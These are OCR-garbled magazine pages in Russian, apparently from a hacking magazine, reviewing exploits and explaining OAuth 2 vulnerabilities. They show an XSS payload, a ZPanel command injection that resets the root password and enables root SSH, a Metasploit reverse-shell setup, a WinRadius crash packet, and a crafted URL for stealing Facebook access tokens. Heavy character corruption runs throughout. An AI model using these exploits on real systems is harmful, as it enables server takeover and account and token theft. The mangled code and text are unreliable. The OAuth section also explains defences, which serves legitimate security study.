Израильская компания СНескпгагх провела аудит безопасности 50 наиболее 
популярных плагинов для Ѵ/огйРге 55, в результате которого выяснилось, 
что 20 % плагинов уязвимы к атакам 50Ь Щесйоп, Х55, С5КР и РаіН Тгаѵегзаі 




7 ® 



Взлом 
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Пример ввода Х88-кода 



Далее выдаем атакуемому пользователю полученный линк, и после его захода 
на нашустраницуу него любезно открывается порт для входя щихподключений. 

ТАПСЕТ8 

Огасіе ѴѴеЬСепІег Сопіепі версий 10.1.3.5.1 и 11.1.1.6.0. 

80ШТІ0Ы 

Есть исправления от производителя. 



Х$$ В РУУВІКСМ8 1.1.1 



СѴ88ѵ2: 


ІЧ/А 


Дата релиза: 


5 июня 2013 года 


Автор: 


ехрЮНЗг 


СѴЕ: 


ІЧ/А 


ЕХРЮІТ 




Уязвимы следующие адреса и параметры: 



• И1:1:р://гииЬікстз/гииЬікстз/стз/іпсІех.рИр [параметры: пате] 

• ІпПр://гииЬікст5/гииЬікст5/ст5/ех1гапе1.рНр?р=тетЬег-агеа 

[параметры: пате] 

• Нйр://гииЬікстз/гииЫкст5/ст5/5і1е5е1ир.рІір 

[параметры: пате , зііегоо*] 

• Н11р://гииЬікстз/гииЬікст5/ст5/и5ег5.рІір?гоІе=5&р=1:е5І: 

[параметры: Лгзіпате , Іазіпате] 

Пример эксплуатации. Идем на вкладку «Радез» и вводим в поле «Раде пате» 

"><зсгір1:>а1ег1:( 'хзз 1 )</зсгір1:> 

Обновив страницу, увидим всплывающее окно. Также, кликнув по вкладке 
«ІЧеѵѵз», увидим снова выполнение нашего кода. 

Если у нас нет прав на создание новостей и страниц, то наверняка есть права 
на ввод своего имени и фамилии. Дорк, по которому в Соодіе можно найти сай- 
ты на этой СМ3, следующий: роѵѵегесі Ьу шиЬікстз. 

ТАПСЕТ8 

ВииЬікСМЗ 1.1.1 и ниже. 

80ШТІ0Ы 

Патча на момент написания статьи не существовало. 

УДАЛЕННОЕ ВЫПОЛНЕНИЕ КОМАНД 

в тж ю.о.0.2 

СѴ88ѵ2: ІЧ/А 

Дата релиза: 7 июня 2013 года 

Автор: зНасРііЬізІа 

СѴЕ: ІЧ/А 

В рамках аудита исходного кода популярной веб-панели для управления хо- 
стингом команда исследователей обнаружила проблему в модуле НІраззѵѵсІ. 



ЦИШ 




Пример выполнения кода 



Ошибка заключается в недостаточной проверке поля «ІІзегпате», что позволя- 
ет атакующему выполнить различные команды. 

Разработчики 2РапеІ исправили эту уязвимость, добавив функцию обра- 
ботки специальных символов для полей имени пользователя и пароля: 

• $іпНТІІ5егпапле . " " . $іпНТРазз\л/огсІ . 

• езсарезІіеІІагд($іпНТІІ5егпате) . " " . езсарезІіеІІагд($іпНТРа55\л/огсІ) . 

ЕХРДОІТ 

Рассмотрим процесс эксплуатации этой уязвимости: 

1 . Логинимся под любым пользователем и идем по следующему адресу: 

ІтЕІір: //<зегѵег асИгезз>/?тосІи1е=Іі1:ра55іл/сІ&5е1ес1:есІ=4-< 
5е1ес1=есІ&ра1=Іі=/ 

2. В поле «ІІзегпате» вводим: 

; /еІіс/грапеІ/рапеІ/Ьіп/гзисІо "есііо 1 пеыраззмогсГ " " | <-■ 
раЗБЫСІ --5ІІСІІП гоо*^# 

Вводим любой пароль. Пароль Вооі будет изменен на пеѵѵраззѵѵогсі. 

3. Далее идем снова по адресу: 

ІтЕір: //<5егѵег_асІсІге55>/?тосІи1е=Іт1:ра55Ѵ\/сІ&5е1ес1:есІ=<-< 
5е1ес1=есІ&ра1=Іі=/ 

4. В поле «ІІзегпате» вводим: 

: /еІіс/грапеІ/рапеІ/Ьіп/гзисІо зесі ' -і "з/#*\<-‘ 
(Регті1:Коо1:І.о|5Іп\)/\1 ѵез \#/" /е1=с/55Іп/*ІпсІ*^ ' # 

Это разрешит авторизацию пользователя гооі по ЗЗН . 

5. Можно повторить команду, чтобы открыть порт 22 в ірІаЫез: 

ірІіаЬІез -А ІІЧРІІТ -р 1=ср - -сірогі: 22 АССЕРТ 

и перезапустить ЗЗН-сервер. Но придется повторить процесс дважды, так 
как размер буфера для команды 2 зисІо равен 1 00 символам. 

Помимоэтого, существует Меіазріоіі-модульсвозможностью добавить все 
доступные полезные нагрузки для ОС І_іпих: 



тз-Р > изе ехрІоіІі/ипіх/ыеЬарр/грапеІ изегпате ехес 



гпБ-Р ехоІоі'РРгоапеІ 


изегпате 


ехес) 


> 


«-І 




зеі: РАУШАР еепегіс/зііеіі геѵегзе 


Іср 




тз-Р ехрІоіІіГграпеІ 


изегпате 


ехес) 


> 


зеі: 


192.168.24.141 


тз-Р ехрІоіІіРграпеІ 


изегпате 


ехес) 


> 


зеі: 


РА55ІЛІ0К0 раззыогсі 


тз-Р ехрІоіІіРграпеІ 


изегпате 


ехес) 


> 


зеі: 


192.168.24.143 


тз-Р ехрІоі'РРграпеІ 


изегпате 


ехес) 


> 


зеі: 


ІІ5ЕКІЧАМЕ изег 


тз-Р ехрІоі'РРграпеІ 


изегпате 


ехес) 


> 


ехріоіі: 



ТАНСЕТ8 

ІРапеІ 10.0.0.2 и ниже. 

80ШТІ0Ы 

Есть исправления от производителя. 
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Обзор эксплойтов 




Пойманный пакет в ѴѴігезНагк 



РОЗ В ШРАШІІЗ 2.11 

СѴ88ѵ2: ІЧ/А 

Дата релиза: 10 июня 2013 года 

Автор: прп 

СѴЕ: ІЧ/А 

ѴѴіпРасІіиз представляет собой реализацию РАОІІІЗ-сервера для ѴѴіпсІоѵѵз- 
систем и используется для авторизации, аутентификации и учета пользовате- 
лей. Найденная ошибка в ѴѴіпРасІіиз возникает при получении сервером специ- 
ально сконструированного сообщения, в котором передается неправильное 
значение длины пароля. Данная уязвимость может вызватьего падение. 

ЕХРДОІТ 

Для воспроизведения уязвимости вначале поймаем пакет аутентификации. 
Будем использовать программу габсііепі:, с помощью которой отправим наш 
запрос, и программу ѴѴігезІіагк для поимки и разбора пакета. 

Далее реконструируем пакет так, чтобы можно было его отправить с по- 
мощью РуіНоп-программы: 



рмп = "\х01" # Код 01 

рмп += "Хх-р-р" # Идентификатор пакета 

рѵт += "\хѲѲ\х2с" # Длина 44 

рѵт += "\хсІ1\х5б\х8а\х38\х-РЬ\хеа\х4а\х4Ѳ\хЬ7\х8а\ха2\х7а\4-< 

х8~Р\хЗе\хае\х2 3" # Аутентификатор 

ршп += "ХхѲІ" # І^ЦБег-ІУатеШ 




ѴѴіпРасііиз не отвечает на запросы 



рып += "ХхѲб" # аѵр: 1=6 

рѵт += "Хх6 1 \х64\х6 1 \х6с1" # Имя пользователя асіаш 

рѵт += "\х02" # аѵр 1:=ІІ5ег-Ра55і\/огс1(2) 

рѵт += "\х12" # аѵр: 1=18 

рып += "\х-РѲ\х13\х57\х7е\х48\х1е\х55\хаа\х7сІ\х29\х6сІ\х7а\<-- 
х88\х18\х89\х21" # Пароль (зашифрован^) 

АѴР (АМгіЬиІе ѵаіие раігз) — это специальные параметры РАРІІІЗ-сервера, 
которые передаются в запросах и ответах для авторизации, аутентификации 
и других действий для аккаунтов пользователей. 

Далее автор уязвимости провел фаззинг всех параметров ( Ьіі.Іѵ/ІаІЧхНсІг ) 
и обнаружил, что если вместо строки 

рып += "\х12" # аѵр: 1=18 

передать большее значение 

рмп += "Хх-р-р" 



и отправить на атакуемый адрес и порт 1812, то в результате наш ѴѴіпРасІіиз 
больше не будет отвечать на запросы. 

ТАПСЕТ8 

ѴѴіпРасІіиз 2. 11 иниже. 

50ШТІ0Ы 

Патча на момент написания статьи не существовало. □□ 



: -# ес^о "из9г-^аппе=асіапп,ІІ5ег-Ра58ѵѵогс[=асіагті 11 | гасісііѳпі 192.168.200.20 

аиИМ ѵапКасііив 

КѳсеіѵесІ гѳзропзѳ 10 149, сосіѳ 2, Т. епдНІп = 44 
РгашесІ-ІР-АсІсІгезз = 255*255,255.254 
РгатесІ-ГСоиІіпд = №опе 
Ргатегі-МТІІ = 1500 
Зѳзеіоп-Тітѳоиі: = 9999999 



Запрос аутентификации с помощью гасісііепі 



В МѴА $Е 7 ІІРОАТЕ 25 УСТРАНЕНО 40 УЯЗВИМОСТЕЙ 



приложением полномочий и убедиться в доступе 
из правильного расположения; добавлены сред- 
ства для проверки отзыва сертификатов перед за- 
пуском апплета; добавлено свойство огд.іср.хплі. 
сІзід.зесигеѴаІісІаІііоп для проверки безопасности 
контента ХМІ_; заблокирован ЫѵеСоппесІ:- доступ 
из ЗаѵаЗсгірІ: к Заѵа АРІ при уровне безопасности 
Ѵегѵ Нідб. 



Огасіе представила обновление Заѵа ЗЕ 7 ІІрсІаіе 
25, в котором устранено 40 проблем с безопасно- 
стью. Из 40 уязвимостей 37 могут быть эксплуати- 
рованы удаленно без проведения аутентификации. 
Многим уязвимостям присвоен максимальный 
уровень опасности — СѴ55 Вазе Зсоге 10.0, что оз- 
начает возможность выхода за пределы изолиро- 
ванного окружения виртуальной машины и иниции- 



рования выполнения кода в системе при обработке 
специально сформированного запроса. Подробно- 
сти ты найдешь по адресу Ьіі.Іѵ/ІЭСІЗѵО . 

Кроме того, данное обновление содержит на- 
бор улучшений, направленных на увеличение безо- 
пасности: в файлах ЗАР МапіТезІ: поддерживаются 
новые атрибуты регтіззіопз и сосІеЬазе, позво- 
ляющие проверить корректность запрошенных 






ОАІІТН 2 



Как система авторизации стала 
средством аутентификации 
и что из этого вышло 
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В 



В мире мэшапов и стартапов многие сайты хотели бы моментально получить доступ к твоим 
друзьям на фейсбуке или к личной информации в твиттере. Но понятное дело, раздавать свои 
логины/пароли кому попало — не самое лучшее решение. Так на свет появилась схема взаи- 
модействия ОАиіМ: клиент (сторонний сайт) имеет специальный ассезз_1океп и с его помощью 
может получать различную информацию и выполнять запросы, но все в пределах разрешен- 
ных тобой (пользователем) полномочий. Со временем ОАиіМ стал очень популярен в качестве 
дополнительного механизма логина, хотя его задача заключается в другом. Все это привело 
к множеству архитектурных уязвимостей, о которых мы сегодня и поговорим. 

• Юзер — это пользователь провайдера, владеющий ресур- 
сами (определенной информацией, графом друзей и так 
далее). 

• Клиент — мобильное приложение/игра, вебсайт или дес- 
ктопный клиент — желает иметь доступ к ресурсам юзера. 

• Ключи (сМепТ сгесІепНаІз) — это постоянные аутентификаци- 
онные токены клиента на провайдере. Состоят из сІіепПсІ 
и сііепізесгеі:. 

• Токен (ассезз іокеп) — это аутентификационные данные 
юзера на провайдере, которые нужны для выполнения за- 
просов. Запрос выглядит в общем виде так: ИИр://ргоѵісІег/ 
пле?ассезз_1:океп=123. 

Алгоритм работы ОАЩН 2 строится следующим образом. 
Сначала клиент отсылает юзера на провайдер с целью получе- 
ния доступа к его ресурсам со следующими параметрами: 

• гесІігесІ_ип — ІІВІ_ колбэка на домене клиента; 

• зсоре — список требуемых привилегий, например ргіѵа1:е_ 
теззадез.изегргоІІІе.ТгіепсІз; 

• сІіепПсІ — ключ; 

• зіаіе — случайное значение, которое провайдер вернет на- 
зад. 

Юзер идет по ссылке к провайдеру, смотрит, что от него тре- 
буют (параметр зсоре), и нажимает «Разрешить». В этом слу- 
чае провайдер редиректит его назад на указанный гесІігесІ_ип 
на домене клиента со следующими параметрами: 



ОА1ЛН7ЧТОЭТО? 

ОАЩН — это открытый протокол авторизации, который позво- 
ляет предоставить третьей стороне ограниченный доступ к за- 
щищенным ресурсам пользователя без необходимости пере- 
давать ей логин и пароль. Например, ты разрабатываешь сайт 
и хочешь, чтобы пользователь имел возможность добавить свою 
персональную информацию из социальных сетей (личные дан- 
ные, список друзей и так далее), например из сети «ВКонтак- 
те». Понятное дело, что сообщать данные своей учетки он тебе 
не намерен. Вот тут-то в дело и вступает ОАЩН. В результате 
пользователь логинится на «ВК», смотрит, к каким данным хочет 
получить доступ твой сайт, и подтверждает (либо отклоняет) за- 
прос. А ты получаешь специальный токен, заменяющий собой 
пару логин/пароль, с помощью которого можешь выполнять 
разрешенные пользователем действия. Имеем: пользователю 
не надо раскрывать свои логин/пароль, сторонний сайт полу- 
чает доступ (опять же с разрешения пользователя) к некоторым 
его данным. На первый взгляд все просто отлично. Но это толь- 
ко на первый взгляд... 




Егор Хомяков 

(дФотакоѵ 



ДЕЙСТВУЮЩИЕ ЛИЦА 

Перед тем как продолжить, давай немного разберемся с тер- 
минологией и принципом работы ОАЩН 2. В рамках статьи мы 
будем оперировать следующими понятиями: 

• Провайдер — это зачастую популярная социальная сеть 
(РасеЬоок, ВКонтакте, Тѵѵійег) с солидной базой пользова- 
телей и данных о них. 



Андрей Лабунец 

@І5СІиШ5 
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ОАІІТН Ѵ$ ОРЕМШ 

Некоторые по незнанию считают, что ОАыІІі и ОрепЮ 
в сущности одно и то же. Это неверно. Как видно 
из рис. 1 , отличительная черта ОАиІН — в нем никто 
не подтверждает личность пользователя. В ОрепЮ 
провайдер передает клиенту сообщение, в котором 
открыто говорится, что владелец пакета — это Вася. 
В ОАиІН пакет лишь содержит ключ, по которому 
можно получить доступ к ресурсам держателя паке- 
та. И «имя» является одним из ресурсов. Вот только 
нет гарантии, что держатель пакета и есть человек, 
чье имя вернет запрос к ресурсам, поскольку такую 
функцию ОАиІН изначально не выполняет. 

Важно помнить, что ОАиІН отвечает лишь за пре- 
доставление клиенту доступа к ресурсам на провай- 
дере от лица юзера и не ставит цели гарантировать 
клиенту, что юзер подлинный. Несмотря на это, поч- 
ти всегда клиенты имеют логин через провайдера 
и полагаются полностью на него. Взаимодействие 
же происходит на поле веба за счет соокіез, реди- 
ректов, Іосаііоп.ііазіі и прочих ненадежных вещей, 
что и приводит к различным уязвимостям. 



• сосіе — идентификатор юзера у провайдера, нужен клиенту, 

чтобы получить токен; 

• зіаіе — то же значение, что было передано на начальный 

II ВІ_. Используется для защиты от С5ВР и для удобства. 

Код не представляет никакой ценности для юзера и его бра- 
узера, так как с его помощью нельзя совершать запросы АРІ, 
и нужен он лишь для одной цели — получить токен клиенту, 
не показывая его самому юзеру. 

Для получения токена клиент производит РОЗТ-запрос 
на /оаиііі/іокеп, передав ключи (сііепііб, сііепізесгеі), собе 
и гебігесіигі, по которому был получен код, — таким образом 
провайдер уверен, что это нужный клиент, и по коду отдает 
токен того самого юзера. Как понятно, ни юзер, ни ІІзег-АдепІ 
и всякие клиентские скрипты (включая Х53) не увидели насто- 
ящий токен. Его знают только клиент и провайдер — в идеале. 

Дальше токен используют для совершения АРІ -запросов, 
когда он истекает, его можно рефрешить (для этого вместе с то- 
кеном возвращается геігезіпіокеп). 

Что касается взаимодействия клиента с провайдером по пе- 
редаче привилегий, то оно бывает двух типов — гезропзеіуре: 
собе и Іокеп. 

Для собе (Аиіііогігаііоп Собе РІоѵѵ) провайдер возвращает 
специальный код на колбэк (гебігесіигі), по которому клиент 
делает запрос вместе с ключами, чтобы получить токен юзера. 

Взаимодействие типа Іокеп, в свою очередь, более 
уязвимо, так как идет передача самого токена напрямую 
на гебігесіигі на клиенте. Хотя он содержится в хеше (данные 
после #) и не сливается в реферерах, он очень легко слива- 
ется с помощью редиректов (смотри Ргадплепі Іеак ѵѵіІН 302 
гебігесі далее). 

На этом с теоретической частью закончим и перейдем не- 
посредственно к рассмотрению уязвимостей. Надо сказать, 
что они все взаимосвязаны, но я все же попытаюсь их распи- 
сать по пунктам, ставя в них ссылки друг на друга. 

ОШИБКИ РЕАЛИЗАЦИИ НА КЛИЕНТЕ 

СЗПРассоипіІіііаскіпд 

Это самая распространенная ошибка, найденная на большин- 
стве веб-сайтов и библиотек (оплпіаиііі для гаііз, зосіаі аиІН 
для біапдо, ТасеЬоок рНр збк). 

Сценарий атаки выглядит следующим образом: 



Рис. 1 . Отличие ОрепЮ 
от ОАиШ 




ѵѵаішшс 



Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



Рис. 2. Страница 
на провайдере, с помо- 
щью которой клиент за- 
прашивает привилегии 
у юзера 



1 . Хакер получает код для своего аккаунта от провайдера по- 
сле разрешения на доступ к ресурсам, но сам по ссылке 
не переходит. 

2. Он заставляет пользователя перейти по ссылке с кодом, 
принадлежащим хакерскому аккаунту (например, пишет 
ему: «Васян, смотри, кто-то залил твои фотки ШІ_»). Нужно 
произвести СЕТ-запрос с браузера жертвы, например че- 
рез картинку <ітд згс="сІіепІ/саІІЬаск?собе=123">. 

3. После чего клиент решит, что жертва присоединяет свой ак- 
каунт провайдера, и получит по данному коду ІІЮ, равный 
II Ю хакера. 

4. Тем самым начнет ассоциировать ІІЮ провайдера с теку- 
щим юзером, фейсбук хакера становится привязан к акка- 
унту жертвы, и дальше хакер может просто зайти через свой 
фейсбук, чтобы попасть прямо в аккаунт жертвы на клиенте. 

Защита: так как все редиректы в ОАиІН используют метод 
СЕТ, обычная СЗПР-защита не обращает на них внимания. По- 
этому придется сгенерировать случайный токен самим, сохра- 
нить в сессии и отправить его в параметре зіаіе (он необяза- 
тельный, и это ошибка авторов стандарта). Провайдер вернет 
значение назад, и для проверки валидности нужно сравнить 
значение зіаіе из колбэка и из сессии. 

Зеззіоп Гіхаііоп оп СІіепі 

Если логин на клиенте уязвим СЗНР, значит, есть возможность 
зафиксировать пользователя в хакерский аккаунт на клиенте 
и присоединить аккаунт пользователя на провайдере к зафик- 
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Кеяие$і ШШ Ь«р://1 : Мкіг.пе'Іаі.пе1/ѵ5р.рЬр 
Кеяиезі МеіЬогі: СЕТ 
5іаіи$ Сосіе: О 200 ОК 
▼ Кеяиезі Неасіегз ѵіеѵѵ зоигсе 
Ассері: */* 

АссерІ-СЬагзеІ: 150-8859-1, и!^-8;ч=0. 7, *;я=0. 3 
Ассері-Епсогііпд: дгір,(іе^1а1е, згісЬ 
Ассерг-Ьапдиаде: еп-Ч5,еп;ч=0.8 
Соплесііоп: кеер-эііѵе 
Но5і: Лхікіі.пеіаі.пеі 

КеГегег: Ь«р://1іаЬгаІіаЬг. ги/да/4659/?сосІе=тЬс7т0ГЬас82сІЬ&5га*е=Ь4е<і002940Ш963с14840«2?к>06643е 
Узег-Адепі: <5СгірІ>аІегТ( 'Ііогаакоѵ' ) ;</5СГІр"1> 



сированному хакерскому аккаунту. То есть прицепить фейсбук 
юзера к своему собственному аккаунту через его временную 
фиксацию. 

Правда, в большинстве случаев это не сработает, так 
как клиенты обычно разрешают привязать один провайдер- 
ский аккаунт к одному клиентскому, но если копии разрешены, 
то можно будет выполнять действия и влиять на социальные 
сети клиента, например спамить в его твиттере/фейсбуке. 

Защита: помним прописные истины веба, что каждое дей- 
ствие должно быть защищено СЗВР-токеном, даже если оно 
не несет в себе никакой видимой опасности. 

ОШИБКИ РЕАЛИЗАЦИИ СЕРВЕРНОЙ 
СТОРОНЫ НА ПРОВАЙДЕРЕ 

Веззіоп Тіхаііоп оп Ргоѵісіег 

Очень многие сайты не проверяют СЗПР-токен на логине и/или 
логауте, что считается негрубой ошибкой. Да и правда, если 
жертва увидит себя залогиненной на фейсбуке под чужим акка- 
унтом —ничего ужасного не случится. Но дело в том, что ОАиШ- 
клиент всецело полагается на тот код, который ему вернет 
фейсбук, а фейсбук вернет код того юзера, который в данный 
момент в нем залогинен. 

Отсутствие проверки гес!ігесі_игі 
при обмене кода на токен 

Такая уязвимость была у ВКонтакте. Суть заключается в ис- 
пользовании в качестве гесІігесІ_игі такого раздела сайта, кото- 
рый каким-либо образом сливает код хакеру, например через 
реферер или через ореп гебігесГ 

Хакер просто использует тот же код по правильному колбэ- 
ку, и клиент начинает верить, что это юзер. Полукостыльной за- 
щитой будет проверка гесІігесі_игі уже в процессе обмена кода 
на токен, и если они не совпали, то это попытка взлома. 

Реальной же защитой будет хранение гесіігесіигі в настрой- 
ках клиента, а не передача его параметром в процессе автори- 
зации. «Гибкий» гесІігес1:_игі — это, пожалуй, 95% всех проблем, 
связанных с ОАиІД, и они есть на фейсбуке и ВКонтакте. 

Таким образом, код будет выслан атакующему на левый 
гесІігесі_игі, и он сможет использовать его уже по правильному 
гесіігесіигі, чтобы залогиниться под аккаунтом жертвы. 

ОШИБКИ РЕАЛИЗАЦИИ КЛИЕНТСКОЙ 
СТОРОНЫ НА ПРОВАЙДЕРЕ 

Важная и особенно интересная часть протоколов авторизации, 
разработанных в рамках ОАЩН, — предоставляемый провайде- 
ром клиентский ЗаѵаЗсгірІжод, или ЗаѵаЗсгірІ: ЗйК. Казалось 
бы, ВРС-документ описывает единственный нужный путь пере- 
дачи как токена, так и кода — серию редиректов. Откуда у мно- 
гих провайдеров (например, РасеЬоок, Соодіе) может вообще 
появиться необходимость добавлять объемный клиентский код 
и как следствие — еще одно направление для атаки? 

Если взглянуть с точки зрения Заѵа5сгір1:-приложения на ме- 
ханизм получения токена по стандарту, то стандарт, естествен- 
но, не говорит, что же делать дальше, когда токен оказался 
в хеше адресной строки какого-то окна. Либо каждый клиент 
пишет свой собственный код, чтобы распарсить ІІНІ_ и доста- 



вить токен, — тогда точно большая часть клиентов будет уяз- 
вима, либо провайдер дает удобную абстракцию (библиотеку) 
каждому клиенту, где достаточно попросить токен через вызов 
единственного метода и дождаться его в своем же колбэке. 
Безусловно, провайдерам по душе второй вариант. Итак, вроде 
бы простая задача по передаче токена заставляет провайдеров 
городить десятки килобайт уязвимого кода. 

Для доставки токена ^-приложению существует две по- 
пулярных модели: модель прокси и модель контроллера. В пер- 
вом случае приложение выполняется внутри фрейма провай- 
дера, а во втором — нет (то есть клиентское приложение — это 
просто сайт, открытый в новой вкладке). 

Модель с прокси предполагает создание специального 
фрейма внутри клиентского окна, в котором и открывается 
ІІВІ_ для запроса токена. Только в качестве гебігесі_игі задается 
специальный провайдерский прокси, куда возвращается токен 
после редиректа. Грязная работа по кросс-доменной переда- 
че токенов приложениям возлагается на ЗаѵаЗсгірІжод внутри 
этого прокси-фрейма. Прокси-фреймами пользуются, напри- 
мер, фейсбук (РасеЬоок Заѵазсгірі: ЗйК) и гугл (Соодіе АРІз 
СІіепІ: ЫЬгагу Тог ^ѵаЗсгірТ). 

Модель с контроллером во всех смыслах больше похо- 
жа на работу операционной системы: в качестве ядра здесь 
выступает провайдерский надфрейм, в котором, подобно 
зузсаІГам, можно делать вызовы. Например, передав наверх 
через розТМеззаде строку определенного вида, приложение 
может попросить у провайдера токен для доступа к пользо- 
вательским данным (провайдер сам отрисует диалог автори- 
зации, если потребуется). Вернуть данные провайдер может 
либо через тот же розТМеззаде, либо, если у тебя старый бра- 
узер, через РІазЬ. Именно так и работают сапѵаз-приложения 
на фейсбуке. Главное отличие этой модели в том, что токен 
запрашивает сам скрипт провайдера с помощью ХНП, без от- 
крытия новых окон и всей этой канители с редиректами: в са- 
мом деле, зачем редиректы и окна, если теперь границы до- 
мена не нарушаются? 

В обеих моделях скрывается множество возможностей 
для атак: суть главной из них — заставить прокси или контрол- 
лер передать токен на чужой домен. И если в обычной реализа- 
ции ОАиШ тяжело ошибиться так, чтобы редирект мог вернуть 
токен на домен атакующего, то в случае клиентского кода про- 
верка соответствия доменов не такая уж тривиальная задача. 
Кроме того, в реализации контроллера очень часто обработ- 
чик асинхронных запросов — это просто вызов еѵаІ(), а значит, 
можно пойти дальше и атаковать контроллер вплоть до меж- 
сайтового скриптинга. В следующих статьях мы покажем не- 
сколько интересных уязвимостей в клиентском коде фейсбука 
и гугла, приводящие как к угону токенов, так и к выполнению 
кода (Х35). 

ОШИБКИ В СТАНДАРТАХ: 

РВАСМЕИТ І.ЕАКШІТН 302 ВЕОШЕСТ 

Для токен-взаимодействия токен передается на гесІігес1:_ 
игі через ЬазЬ-параметр, например ИНр://зіІе.сот/ 
саІІЬаск#ассезз_І:океп=123. Но у фрагмента есть такая инте- 
ресная особенность (я бы назвал ее уязвимостью, которую 
никто не хочет исправлять) — при 302-м редиректе фрагмент 



Рис. 3. Нахабраха- 
бре можно вставлять 
сторонние картинки, 
это скриншот того, 
как код ВКонтакте был 
отправлен в реферере 
на наш сервер 




\ѵ\ѵ\ѵ 



Эран Хаммер (Егап 
Наттег) вычеркнул себя 
из авторов стандарта 
и написал громкий пост 
с критикой: ЬіІ.Іѵ/ОІІІЗІс 
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передается и на другой сайт тоже. Например, если ШІ_#123 
отвечает хедером І_осаііоп: ШІ_2, то браузер загрузит 
ІІРІ_2#123. 

Это создает простейшую технологию для воровства ассезз_ 
Іокеп’ов пользователей клиента — нужно лишь найти 302-й 
редирект на твой сайт (не обязательно ореп гесіігесі;) и открыть 
эту ссылку в окне/фрейме. Провайдер вернет токен в хеше 
для клиента, клиент редиректит на твой сайт, а браузер копиру- 
ет хеш, и твой ЦаѵаЗсгірІ: его «срезает» — ІосаІіоп.ЬазІі.зІісеСІ). 
Попросту говоря, 302-й редирект на домене клиента означает 
уязвимость по слитию токенов пользователей этого клиента. 
ІЧіг СоІсІзИІадег продемонстрировал такие уязвимости на сайтах 
Зкуре, ЭгорЬох и самом РасеЬоок. 

Решение для провайдера: разрешать только конкретный 
гесІігес1:_игі, так как его гибкость сильно увеличивает поверх- 
ность атаки. 

Решение для клиента: не иметь редиректов на сторонние 
сайты. Вообще. 

ПРОЧИЕ ПРИМЕРЫ УЯЗВИМОСТЕЙ: 

АІІТН СООЕ ПЕРІ.Ѵ АТТАСК 

РасеЬоок Соппесі был уязвим для классической Реріау аііаск — 
после одного использования кода он мог применяться для ау- 
тентификации в течение следующих 80 минут. Реплай-атака 
в чистом виде, а значит, чтобы увести аккаунт, нам нужно добыть 
авторизационный код, например через логи, МІТМ, историю 
браузера или другой способ. 

Допустим, на сайте-клиенте найден Х88 — примерно та- 
кой скрипт вытаскивает код для правильного гесІігес1:_игі через 
боситепЬге^еггег. 

<і-Ргате 5гс="ІгЕ'Ер5 : / Ы\т. -РасеЬоок. сот/сІіа1о§/^ 
регтіззіопз . гедиез1:?арр ісІ=15961845746583б&сІІ5р1аѵ=<--- 
ра^е&пех'Е=1тЕ'Ер: //та^ги. пе1:/и5ег5/аи1:Іі/-РасеЬоок/<-< 
са11Ьаск&гезроп5е_1:уре=сосІе" пате="ге-Рсоп1:аіпег" <-■ 
оп!оасІ="а1ег1:(ге-Рсоп1:аіпег .сіоситепі:. ге-РеггегО " ><-■ 
</і-Ргате> 

РАСЕВООК + ОАІІТН 2 + СНКОМЕХ35 АІЮІТОВ 

Напоследок хочу поделиться любопытной цепочкой уязви- 
мостей, за которую мы с Андреем (@ізсіигиз) получили 5000 
долларов от фейсбука. Сначала объясню суть ХЗЗ Аисіііюг 
геТеггег Іеак. 

Задача ХЗЗ АисНіог в хроме — детектить наличие каждого 
38-кода на странице в нагрузке (рауіоасі), то есть своеобразная 
защита от активных ХЗЗ. Он просто ищет совпадение скрипта 
в СЕТ-, РОЗТ-параметрах и в ІосаЬоп.ЬазІі. Логично предполо- 
жить, что если подкинуть пустышку — параметр, содержащий 
код, который уже есть на этой странице, то аудитор найдет со- 
впадение. Кстати, есть три режима Х-ХЗЗ-Ргоіесііоп хедера 
для управления аудитором хрома: 0 (выключить), 1 (включить, 
не запускать скрипты), 1;тосІе=Ыоск (включить, блокировать 
страницу). 

Фейсбук отсылал Х-Х55-Рго1:ес1:іоп: 1 ;гтюсІе=Ыоск. Уязви- 
мость заключалась в том, что после блокирования страницы 
браузер делал редирект на аЬоиЬЫапк, который, в свою оче- 
редь, наследует ориджин страницы парента и тем самым дает 
доступ к адресу заблокированной страницы через ріаудгоипсі. 
сІосиплепЕге^еггег (который может содержать приватную ин- 
формацию). 

Помимо этого, существовал такой РВРАТН, содержащий 33 
ЬазЬЬапд (трюк по управлению ШІ_ без перезагрузки, исполь- 
зующий ІосаІіоп.ЬазЬ), который копировал значение после # 
в путь, тем самым раскрывая его в реферерах и отсылая на сер- 
вер. Исходя из всего сказанного, украсть ассезз_1:океп произ- 
вольного клиента можно при помощи следующего ШІ_: 

Ыііір: //млм. -РасеЬоок. сот/Зіа!о%/оаи1:Ь?с1іеп1:_іЗ=" + <-■ 
1=аг^е1=_арр_ісІ + "&ге5роп5е_1:уре=1:океп&сІІ5р1ау=<-‘ 
попе&с!отаіп=-РасеЬоок. сот&огі^іп=1&гесІіпес1: игі=<-< 
М:1:р%ЗА%2Р%2Р-РасеЬоок . сот%2Р%23%2521%2Рсоппес1=<-- 
%2РхсІ_агЬі1=еп%23%21%2Р1іпсІ--РпіепсІ5%2РЬгоы5ег%ЗРс4-< 
Ь%ЗР~РЗсІ2е47528%2бопі^іп%ЗРІі1=1:р%253А%252Р%252Р^ 
сіеѵеіорегз . -РасеЬоок . сот%252Р-РЗее4а8818%26сІотаіп%ЗР<-- 
-РасеЬоок . сот%2бге1а1:іоп%ЗРрагеп1:%2б5І:а1:е%ЗР"+<-і 
си1:_те+"&5СІк= і о е у 



РасеЬоок ОАиІЬ СІіепІ 

орйопз 

Соп$итег Кеу 
Соп$итег $есгеі 
АиМіогіге Вазе ІШІ 
Ассезз Токеп ІЖІ 

&»ѵ 

/а 




ЬКрзУ/дгарМасеЬоок- со 



ЬКраУ/дгарЬ. (асебооКсо 



Рис. 4. Админка 
клиента на провайде- 
ре — можно настроить 
базовый домен и полу- 
чить свои ключи 




ЩРО 

ОАиФ используют мно- 
гие крупные социальные 
сети: Песісііі, Атагоп, 
ЗеѵіапіАПТ, Ѵапсіех, 
РасеЬоок, ^епсіезк, 
ѴК, РауРаІ, Місгозоіі, 
Соодіе, СіІНиЬ, 
Роигздиаге и другие. 



• сиі_те — нагрузка-пустышка, которая и содержит 
псевдоХЗЗ, заставляющий хром заблокировать страницу. 
В нашем случае это 

<5сгір1:>ѵап Ьі^Ріре = пем (гедиіге( ' Ві^Ріре' ’П*-» 
({"ІісІ" :Ѳ. "-РогсеРіпізЬ" : Іігие} ) : </зсг±р1:> ' 

• 1агде1_арр_ісІ — это сІіепПсІ, токен которого мы хотим 
украсть. Поэтому возьмем популярные приложения, токены 
